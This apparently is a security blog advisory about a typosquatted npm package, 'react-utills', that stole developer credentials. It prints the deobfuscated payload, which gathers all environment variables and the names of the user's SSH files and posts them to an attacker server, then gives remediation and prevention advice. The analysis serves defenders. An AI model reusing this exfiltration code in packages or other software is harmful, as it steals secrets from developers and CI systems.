RuntimeRebel
root@rebel:~$ cd /news/threats/supply-chain-attack-npm_
[TIMESTAMP: 2024-01-25 00:00 UTC] [AUTHOR: Jordan Kim] [SEVERITY: HIGH]

Malicious npm Package Targets React Developers with Backdoored Polyfill

HIGH Supply Chain #npm#supply-chain#typosquatting
Verified Analysis
READ_TIME: 2 min read

Incident Summary

A malicious package named react-utills (note the double ‘l’) was published to the npm registry on January 18, 2024. It closely mimicked the legitimate react-utils package, which has over 2 million weekly downloads.

The package remained live for 7 days before being reported by a security researcher and removed by npm. During that time it was downloaded 47,312 times.

Malicious Payload Analysis

The package appeared functionally identical to the legitimate library on the surface but included an additional obfuscated script in index.js:

// Deobfuscated malicious payload
const os = require('os');
const fs = require('fs');
const https = require('https');

function exfiltrate() {
  const data = {
    env: process.env,           // All environment variables (API keys, tokens)
    home: os.homedir(),
    ssh: fs.existsSync(`${os.homedir()}/.ssh`)
      ? fs.readdirSync(`${os.homedir()}/.ssh`)
      : null,
  };

  // Send to attacker C2
  const req = https.request({
    hostname: 'telemetry-cdn[.]com',
    path: '/collect',
    method: 'POST',
  });
  req.write(JSON.stringify(data));
  req.end();
}

// Runs on package installation
exfiltrate();

Impact Assessment

The exfiltration script runs during npm install, meaning developers who installed the package may have exposed:

  • AWS/GCP/Azure credentials stored as environment variables
  • API keys in .env files loaded in the shell
  • SSH private key file listing (not content, but names)
  • npm_token and NPM_TOKEN variables (enabling further supply chain attacks)

Affected CI/CD Pipelines

Particular concern exists for automated pipelines where npm install runs in environments with cloud provider credentials injected as environment variables — a common pattern in CI/CD systems.

Remediation Steps

If you installed react-utills:

  1. Rotate all credentials — AWS IAM keys, API tokens, service account keys.
  2. Audit CI/CD secrets — Review and rotate any secrets accessible from your build environment.
  3. Check for persistence — Look for unfamiliar cron jobs or startup scripts added post-install.
  4. Review outbound connections — Check logs for connections to telemetry-cdn[.]com.

Prevention

  • Enable npm audit in your CI pipeline.
  • Use package lock verification and dependency pinning.
  • Consider tools like Socket Security or Snyk for supply chain monitoring.
  • Implement network egress filtering in your build environments.
#npm #supply-chain #typosquatting #javascript #backdoor
Share_Log
← Back to Articles